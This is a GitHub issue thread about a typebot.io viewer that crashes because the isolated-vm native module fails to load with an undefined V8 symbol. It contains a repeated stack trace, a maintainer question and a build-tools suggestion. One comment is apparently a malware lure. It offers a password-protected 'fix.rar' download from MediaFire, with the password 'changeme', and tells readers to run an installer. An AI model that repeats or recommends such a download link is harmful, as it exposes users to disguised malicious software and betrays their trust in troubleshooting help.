### ISSUE TITLE
Error isolated_vm.node: undefined symbol:

### ISSUE THREAD

**Issue by cristianormoraes** [baptisteArno/typebot.io#1745]
I'm getting this error in the viewer:

" Error! Couldn't initiate the chat. (Internal Server Error) "

LOGS:

> viewer@0.1.0 start /var/www/typebot.io/apps/viewer
> dotenv -e ./.env -e ../../.env -- next start "-p" "4001"

   ▲ Next.js 14.1.0
   - Local:        http://localhost:4001

- event [next-runtime-env] read environment variables prefixed with 'NEXT_PUBLIC_' from process.env.
- ready [next-runtime-env] wrote browser runtime environment variables to '/var/www/typebot.io/apps/viewer/public/__ENV.js'.
 ⚠ "next start" does not work with "output: standalone" configuration. Use "node .next/standalone/server.js" instead.
 ✓ Ready in 702ms
Error: /var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/out/isolated_vm.node: undefined symbol: _ZN2v815ValueSerializer8Delegate24AdoptSharedValueConveyorEPNS_7IsolateEONS_19SharedValueConveyorE
    at Module._extensions..node (node:internal/modules/cjs/loader:1460:18)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Module.require (node:internal/modules/cjs/loader:1231:19)
    at mod.require (/var/www/typebot.io/node_modules/.pnpm/next@14.1.0_@babel+core@7.22.9_@opentelemetry+api@1.9.0_react-dom@18.2.0_react@18.2.0__react@18.2.0/node_modules/next/dist/server/require-hook.js:65:28)
    at require (node:internal/modules/helpers:177:18)
    at Object.<anonymous> (/var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/isolated-vm.js:1:18)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32) {
  code: 'ERR_DLOPEN_FAILED'
}
Error: /var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/out/isolated_vm.node: undefined symbol: _ZN2v815ValueSerializer8Delegate24AdoptSharedValueConveyorEPNS_7IsolateEONS_19SharedValueConveyorE
    at Module._extensions..node (node:internal/modules/cjs/loader:1460:18)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Module.require (node:internal/modules/cjs/loader:1231:19)
    at mod.require (/var/www/typebot.io/node_modules/.pnpm/next@14.1.0_@babel+core@7.22.9_@opentelemetry+api@1.9.0_react-dom@18.2.0_react@18.2.0__react@18.2.0/node_modules/next/dist/server/require-hook.js:65:28)
    at require (node:internal/modules/helpers:177:18)
    at Object.<anonymous> (/var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/isolated-vm.js:1:18)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32) {
  code: 'ERR_DLOPEN_FAILED'
}
Error: /var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/out/isolated_vm.node: undefined symbol: _ZN2v815ValueSerializer8Delegate24AdoptSharedValueConveyorEPNS_7IsolateEONS_19SharedValueConveyorE
    at Module._extensions..node (node:internal/modules/cjs/loader:1460:18)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Module.require (node:internal/modules/cjs/loader:1231:19)
    at mod.require (/var/www/typebot.io/node_modules/.pnpm/next@14.1.0_@babel+core@7.22.9_@opentelemetry+api@1.9.0_react-dom@18.2.0_react@18.2.0__react@18.2.0/node_modules/next/dist/server/require-hook.js:65:28)
    at require (node:internal/modules/helpers:177:18)
    at Object.<anonymous> (/var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/isolated-vm.js:1:18)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32) {
  code: 'ERR_DLOPEN_FAILED'
}
Error: /var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/out/isolated_vm.node: undefined symbol: _ZN2v815ValueSerializer8Delegate24AdoptSharedValueConveyorEPNS_7IsolateEONS_19SharedValueConveyorE
    at Module._extensions..node (node:internal/modules/cjs/loader:1460:18)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Module.require (node:internal/modules/cjs/loader:1231:19)
    at mod.require (/var/www/typebot.io/node_modules/.pnpm/next@14.1.0_@babel+core@7.22.9_@opentelemetry+api@1.9.0_react-dom@18.2.0_react@18.2.0__react@18.2.0/node_modules/next/dist/server/require-hook.js:65:28)
    at require (node:internal/modules/helpers:177:18)
    at Object.<anonymous> (/var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/isolated-vm.js:1:18)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32) {
  code: 'ERR_DLOPEN_FAILED'
}
Error: /var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/out/isolated_vm.node: undefined symbol: _ZN2v815ValueSerializer8Delegate24AdoptSharedValueConveyorEPNS_7IsolateEONS_19SharedValueConveyorE
    at Module._extensions..node (node:internal/modules/cjs/loader:1460:18)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Module.require (node:internal/modules/cjs/loader:1231:19)
    at mod.require (/var/www/typebot.io/node_modules/.pnpm/next@14.1.0_@babel+core@7.22.9_@opentelemetry+api@1.9.0_react-dom@18.2.0_react@18.2.0__react@18.2.0/node_modules/next/dist/server/require-hook.js:65:28)
    at require (node:internal/modules/helpers:177:18)
    at Object.<anonymous> (/var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/isolated-vm.js:1:18)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32) {
  code: 'ERR_DLOPEN_FAILED'
}
Error: /var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/out/isolated_vm.node: undefined symbol: _ZN2v815ValueSerializer8Delegate24AdoptSharedValueConveyorEPNS_7IsolateEONS_19SharedValueConveyorE
    at Module._extensions..node (node:internal/modules/cjs/loader:1460:18)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Module.require (node:internal/modules/cjs/loader:1231:19)
    at mod.require (/var/www/typebot.io/node_modules/.pnpm/next@14.1.0_@babel+core@7.22.9_@opentelemetry+api@1.9.0_react-dom@18.2.0_react@18.2.0__react@18.2.0/node_modules/next/dist/server/require-hook.js:65:28)
    at require (node:internal/modules/helpers:177:18)
    at Object.<anonymous> (/var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/isolated-vm.js:1:18)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32) {
  code: 'ERR_DLOPEN_FAILED'
}
 ⨯ Error: /var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/out/isolated_vm.node: undefined symbol: _ZN2v815ValueSerializer8Delegate24AdoptSharedValueConveyorEPNS_7IsolateEONS_19SharedValueConveyorE
    at Module._extensions..node (node:internal/modules/cjs/loader:1460:18)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Module.require (node:internal/modules/cjs/loader:1231:19)
    at mod.require (/var/www/typebot.io/node_modules/.pnpm/next@14.1.0_@babel+core@7.22.9_@opentelemetry+api@1.9.0_react-dom@18.2.0_react@18.2.0__react@18.2.0/node_modules/next/dist/server/require-hook.js:65:28)
    at require (node:internal/modules/helpers:177:18)
    at Object.<anonymous> (/var/www/typebot.io/node_modules/.pnpm/isolated-vm@5.0.1/node_modules/isolated-vm/isolated-vm.js:1:18)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32) {
  code: 'ERR_DLOPEN_FAILED'
}

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by baptisteArno** [comment]
What deployment guide are you following?

**Comment by grimvik90** [comment]
ejecute el siguiente comando sudo apt-get install python g++ build-essential

**Comment by baptisteArno** [comment]
Closing, feel free to re-open
